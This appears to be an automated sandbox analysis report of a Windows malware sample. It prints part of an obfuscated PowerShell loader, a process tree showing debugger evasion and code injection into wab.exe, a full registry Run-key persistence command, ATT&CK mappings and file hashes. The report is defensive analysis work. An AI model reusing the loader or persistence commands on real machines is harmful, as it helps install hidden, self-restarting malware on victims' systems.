Sireg,ravel,pirioUnilobJordoaMineslDiplo: agaB FejlrCenoboBrevswApulinSouthnFrifue ,lies Spi,sHorne1Overd2Sy,hi5K ffe=Opp,s$SacchtAnemorPantouUndupe,mpre ') ;Compulsed $Necrologies;Compulsed (alcoholist 'FredeS BoxftUd rma Udsor Skr,tPres,-Pol.gSAfgaslPrel eMeroce MisapAgerh Carin4Comic ');Compulsed (alcoholist ' S il$.ettigHandllRelenoDriftbTaskmaafskilCit,r:Bge oMCon eeVrng,r hartgTilkoeSprlln UdskcHy,pee ,her=Broek(BludgTNoncoeBrugesGym.ot ,egn-premoPlysteaGrofttInkomhFarve Ramad$MelinCOmegnhExtr icharml Sha.iKorrefMecharBrumbuD,lesgImportafsaaeKristrTan.hnYelleeKrystsenden)Decis ') ;Compulsed (alcoholist 'Count$C thogR odilInitioHyldebLo.enaFest.lRanin:Im.unUHighbnHom gmBrod.e nbeadPoet,iblodscRigsaiUnrefnMar eaProgrlRimta=Obsti$L.nglg.dsaglcertioR darb FantaPerislKnobn:Tmrerf orcioBolomr,arunkReforoSw,gsnTilvetSelsko.rugtr Lufte In.ttPodge+ Fora+Sterl% S.ov$retveSSun.hk K,pioBeativ HoejePre trT ope.Midt.c K nno Con u Ove.nAntistDet,i ') ;$Ingester=$Skover[$Unmedicinal];}$Tash=309240;$Frugtsukkerets=29256;Compulsed (alcoholist 'Kinas$PrimagMeta lPneumoUpfrobTrikoaAtriulAutog: ,orfHUrb,teNedspmOrkano BlastYmpnir Ptero basipEndevhIsseseSkill Isoqu=,ende AgatGCheireKokettreada-KardsCKontioIn.cunW,vectStaaleAl.opnEricat p.es Sc,ll$HomesCPedogh Ha.diSyn.elP.ngeiSlfanf Helir.praau Consgs.pert,akkeeLum nr GratnDomajeNath,s Snel ');Compulsed (alcoholist 'Boble$PrecogS adel Cr.soSemanbDesoraSputtlTrigo:NatioMopve.e InfetCo,iiaAp.erlHa.pbsLa.tikLysteaHo chbinc.ee imancoachevekslsStere Delet=Bedca Unsha[.ydetSB,lllyIndissLedd.tB.gnie Eli mMisda.AdephCSpiraoSacchnPrer.v lageeAfstnrUendetProbl]Sport: R,ak:Pl,nsF Conkr Di,coLamiamUnderBKrickaForsksAc.dieRev s6Arsen4ByrliSSterotDietar Meetisyst.n,alengFrems(Skfte$BatalHA,lgseTaf,emAlib,oCha ttuns rrLkkero,yttep Un.ohReexaeSurp ) Klav ');Compulsed (alcoholist ' Tre.$SalvngN nvalBuffeoBhenvbKlassa Undelreg,d:SmaasWR.touhDagafe D tuyFil,deFogyiy,hill Sirre=act v Super[ Sho.SKendeyDenunsCaprytKontrePreanmsolv,.PadgeTGaarde Grafx W.urtSnder.Optr EElegyn VerdcOx daoFootsd AnsgiPeewen K psgF lke] Beta: bran:.alynAAlderS,ollyCIndleIBilioISlren.TreetG ParaeGo iottilliSca.iatOctaprPelariGae.tnNondegOver.(Enigm$F lmcMNoneneDi.uct .aliaDaginlConses,orgrk lan augrisb etaleObjeknContieH eresMo um) Syre ');Compulsed (alcoholist 'Sange$NonthgMi.tnl No coFou,ab Schaa Vrell V rm: chorEKons lEnn.svVa beiBargonSt reaPre.n=Medal$ DetaWMedlehSkdete.lethyKomiteFerskyH,dro.Mon.bsT,ansu ResebReinesRe.letFluesrDressiFlaglnTrencgIn.vi(,ancr$IndusTHome.aHderss.kifthLseti,Testu$ StamFTorskrDisseuJobbegB.sint,aaobsZymoluPerknkJ,hankAtomseT lpir CatheDefortRejeksAchro)Sanit ');Compulsed $Elvina;"
4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1756

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\behint.shr && echo t"
5⤵
PID:3656

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
5⤵
- Modifies system executable filetype association
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3580

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Nonharmoniousness171% -w 1 $Acetonen=(Get-ItemProperty -Path 'HKCU:\ledelsessystemets\').Hovedstillingers;%Nonharmoniousness171% ($Acetonen)"
6⤵
- Suspicious use of WriteProcessMemory
PID:4444

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Nonharmoniousness171% -w 1 $Acetonen=(Get-ItemProperty -Path 'HKCU:\ledelsessystemets\').Hovedstillingers;%Nonharmoniousness171% ($Acetonen)"
7⤵
- Adds Run key to start application
- Modifies registry key
PID:4004

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Event Triggered Execution

1

T1546

Change Default File Association

1

T1546.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Event Triggered Execution

1

T1546

Change Default File Association

1

T1546.001

Defense Evasion

Modify Registry

3

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE
Filesize
86KB

MD5
0a1704e48ff603332eaac935608d3cf1

SHA1
e138d3d481c054a89b85312bfddd2f8a0baf8c1b

SHA256
d9e02af7b220e25f385c71e0a3be4b83203e0673cc1e56fcf02d3e1f0f3774b6

SHA512
7cec7a7c5542e66e347381e9ab5572b2231ab11dac61d9a76bcb7cbd4bd1e86f8169e7840c2e69f93e686cc1834e52cd6b47817b760ea618139a3de64076314f

Download Submit
C:\Users\Admin\AppData\Local\Temp\3582-490\wab.exe
Filesize
464KB

MD5
72ad21d191b58842334d32a381ea7fa8

SHA1
f7375f09855a7bce9f7a152c75e84aac69caf828

SHA256
87abfab7bf5e213fc9e63c7fa39edfa6452eb5f7fdd668cd370d9cf4ea3ef729

SHA512
78662231c7ce0d03374b69dfd32614786dc5bf0c8ad2baadf2143f42bb03bd378632cc457dc414aa7e3d284674cc9151c39f90d71d9a5dd15dba689b2283386d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g3py32c1.hla.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\xmwugm.vbs
Filesize
896KB

MD5
c6ea093c28624fba97ebea592736640c

SHA1
b989c4f2377c8cb0e362b0ad96238194ae0e534a

SHA256
4c50875efb6badccfe526c866dab42b2f6a40e8a490e1cb6119020ed4849dbce

SHA512
3194847043a76863b583bc386a3e90443132b18de9563ac98d940f22d9fd61c39109008ccd1f92fc2a3b05e3815998a62abfc820ec0e8b2c14a41d009bd51f58

Download Submit
C:\Users\Admin\AppData\Roaming\behint.shr
Filesize
440KB

MD5
bf49435216b596110f42c8cf49e9ff88

SHA1
1311c671bf48e4021d3b152b6d843eb2fb712cc6

SHA256
d2f505d87f1458187860f7d4b0605963ea921635b3cb9ce4825b92e5c86c3d14

SHA512
9b66cac0a87809a1e63c59c9f1c430c1b5af30ddd27f0b6c2d93de8381bf764c96093384b8f67ce970ef46a589bfebce4b9ff7444b512bcd6132de82eb011e7f

Download Submit
memory/1756-40-0x00000000069A0000-0x00000000069EC000-memory.dmp

Filesize
304KB

Download
memory/1756-42-0x0000000006F10000-0x0000000006F2A000-memory.dmp

Filesize
104KB

Download
memory/1756-24-0x0000000003040000-0x0000000003076000-memory.dmp

Filesize
216KB

Download
memory/1756-25-0x0000000005BE0000-0x0000000006208000-memory.dmp

Filesize
6.2MB

Download
memory/1756-26-0x0000000005AD0000-0x0000000005AF2000-memory.dmp

Filesize
136KB

Download
memory/1756-27-0x00000000062C0000-0x0000000006326000-memory.dmp

Filesize
408KB

Download
memory/1756-28-0x0000000006330000-0x0000000006396000-memory.dmp

Filesize
408KB

Download
memory/1756-38-0x00000000064E0000-0x0000000006834000-memory.dmp

Filesize
3.3MB

Download
memory/1756-39-0x0000000006970000-0x000000000698E000-memory.dmp

Filesize
120KB

Download
memory/1756-47-0x0000000009390000-0x000000000A8BD000-memory.dmp

Filesize
21.2MB

Download
memory/1756-41-0x00000000081B0000-0x000000000882A000-memory.dmp

Filesize
6.5MB

Download
memory/1756-45-0x0000000008DE0000-0x0000000009384000-memory.dmp

Filesize
5.6MB

Download
memory/1756-43-0x0000000007C70000-0x0000000007D06000-memory.dmp

Filesize
600KB

Download
memory/1756-44-0x0000000007BD0000-0x0000000007BF2000-memory.dmp

Filesize
136KB

Download
memory/3580-55-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/3580-130-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/3580-156-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/3580-157-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/3580-159-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/4428-13-0x000002C4AD530000-0x000002C4AD552000-memory.dmp

Filesize
136KB

Download
memory/5064-11-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp

Filesize
10.8MB

Download
memory/5064-0-0x00007FF9F8B43000-0x00007FF9F8B45000-memory.dmp

Filesize
8KB

Download
memory/5064-6-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp

Filesize
10.8MB

Download
memory/5064-1-0x00000000005F0000-0x0000000000600000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads